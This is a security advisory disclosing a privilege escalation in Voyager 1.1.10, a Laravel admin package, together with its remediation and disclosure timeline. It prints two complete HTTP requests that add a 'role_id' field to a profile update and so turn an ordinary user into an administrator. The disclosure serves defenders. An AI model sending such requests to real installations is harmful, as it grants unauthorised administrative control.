############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Voyager # Vendor: The Control Group (Open Source) # CSNC ID: CSNC-2018-39 # Subject: Privilege Escalation # Risk: High (CVSS 3.0 Base Score: 8.1) # CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C # Effect: Remotely exploitable # Author: Fabio Poloni # Date: 07.11.2018 # ############################################################# Introduction: ------------- Voyager [1] is a Laravel Admin Package that includes BREAD(CRUD) operations, a media manager, menu builder, and much more. A user can read and update his own profile. However it's possible to assign yourself a role with higher privileges. Affected: --------- Vulnerable: * Version 1.1.10 Other versions are not tested. Technical Description --------------------- A user can assign itself a new `role_id` while updating the profile. The field has to be added manually and must be set to a valid `role_id`. By default the id of the administrator role is 1. ```` POST /admin/users/2 HTTP/1.1 Host: localhost:8000 X-CSRF-TOKEN: [...] X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1015722260128466940934609617 Content-Length: 1359 Cookie: XSRF-TOKEN=[...]; laravel_session=[...] -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="_method" PUT -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="_token" [...] -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="name" user -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="email" user@user.com -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="password" -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="role_id" 1 -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="user_belongstomany_role_relationship[]" -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="" -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="locale" en -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="" -----------------------------1015722260128466940934609617 Content-Disposition: form-data; name="_validate" 1 -----------------------------1015722260128466940934609617-- ```` For some reason there has to be a second request for the `role_id` to be correctly saved: ```` POST /admin/users/2 HTTP/1.1 Host: localhost:8000 Content-Type: multipart/form-data; boundary=---------------------------60845160970064778167421123 Content-Length: 1040 Cookie: XSRF-TOKEN=[...]; laravel_session=[...] -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="_method" PUT -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="_token" [...] -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="name" user -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="email" user@user.com -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="password" -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="role_id" 1 -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="locale" en -----------------------------60845160970064778167421123 Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream -----------------------------60845160970064778167421123-- ```` User with the id 2 is now administrator. Vulnerability Classification ---------------------------- * CVSS v3.0 Base Score: 8.1 * CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C Remediation ----------- Update to the latest release (1.2.0). Please see Voyager releases [2] for release notes and download links. Timeline -------- 2019-03-05: According to vendor the vulnerability has been addressed (https://github.com/the-control-group/voyager/pull/3016) 2018-12-20: Vulnerabilities confirmed 2018-12-18: Fifth contact attempt via email to a former and current maintainer, response received 2018-11-23: Forth contact attempt via email (hello@thecontrolgroup.com) and direct contact to employee on LinkedIn 2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com) 2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD) 2018-11-07: Initial vendor notification via contact form (https://thecontrolgroup.com/contact) 2018-11-05: Discovery by Fabio Poloni References: ----------- [1] https://github.com/the-control-group/voyager [2] https://github.com/the-control-group/voyager/releases